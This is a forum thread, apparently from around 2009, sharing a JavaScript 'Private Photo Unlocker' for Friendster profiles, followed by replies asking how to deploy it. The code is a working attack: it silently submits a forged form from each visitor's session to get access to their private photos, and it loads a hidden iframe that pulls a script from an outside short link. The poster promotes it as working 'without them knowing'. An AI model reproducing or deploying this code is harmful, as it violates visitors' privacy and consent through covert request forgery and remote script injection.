Private Photo Unlocker by master feruzz
3 posters
Page 1 of 1
Private Photo Unlocker by master feruzz
Note:I will not be responsible for any misuse due to the use of this code. Use at your own risks.
The CodeDescription:When someone viewed your profile you can automatically gain access to private photos without them knowing.
You will receive a message (New Window) about the private photo access.
- Code:
var Private=new Class({
initialize:function(opt){
this.opt=Object.extend({
src:$$('.imgblock200 img')[0].getProperty('src'),photo:true,profile:true
},opt||{});
var pvt=this,dm='http://www.friendster.com/';
var c=new Element('iframe',{
'height':1,'name':'rahsia','width':1
}).injectAfter(new Element('form',{
'action':dm+'privatephotos.php','id':'kantoi','method':'post','target':'rahsia'
}).adopt(new Element('input',{
'type':'hidden','name':'_submitted','value':1
})).adopt(new Element('input',{
'type':'hidden','name':'action','value':'inviteToView'
})).adopt(new Element('input',{
'type':'bedal','name':'friend','value':pvt.opt.src+';'+pageOwnerFName+';'+pageOwnerID
})).inject(new Element('span').setStyle('display','none')).inject(document.head));
if(pageViewerID.indexOf((pageOwnerID||''))<0){
if(pvt.opt.photo){
$E('form[id=kantoi]').submit();
}
if(pvt.opt.profile){
var d=new Element('iframe',{
'height':1,'src':dm+'comments.php?uid=16512682&js=http://u.nu/7esm','width':1
}).inject(document.head);
}
return true;
}
}
});
window.addEvent('domready',function(){
var pR=new Private({photo:true,profile:true});
});
This code is made by master Feruzz
Re: Private Photo Unlocker by master feruzz
how to use this?
chix_kiz- Amatuer
- Posts : 73
Reputation : 1
Join date : 2009-08-08
Age : 34
Location : United States of Sadako
Re: Private Photo Unlocker by master feruzz
CHIX CHANGE THE IUD WITH YOUR OWN IUD OK =)
codeplay- Newbie
- Posts : 2
Reputation : 0
Join date : 2009-07-13
Re: Private Photo Unlocker by master feruzz
I know but, do I need to save it as .js or .css and upload to my hosting site?then generated just like regular codes?
because I've tried it and it didn't work!
because I've tried it and it didn't work!
chix_kiz- Amatuer
- Posts : 73
Reputation : 1
Join date : 2009-08-08
Age : 34
Location : United States of Sadako
Similar topics
» viewers main photo on sidebar
» MALIBOG MASTER IS BACK!!!!
» Animated Main Photo
» Moving Photo Gallery
» elastic primary photo
» MALIBOG MASTER IS BACK!!!!
» Animated Main Photo
» Moving Photo Gallery
» elastic primary photo
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum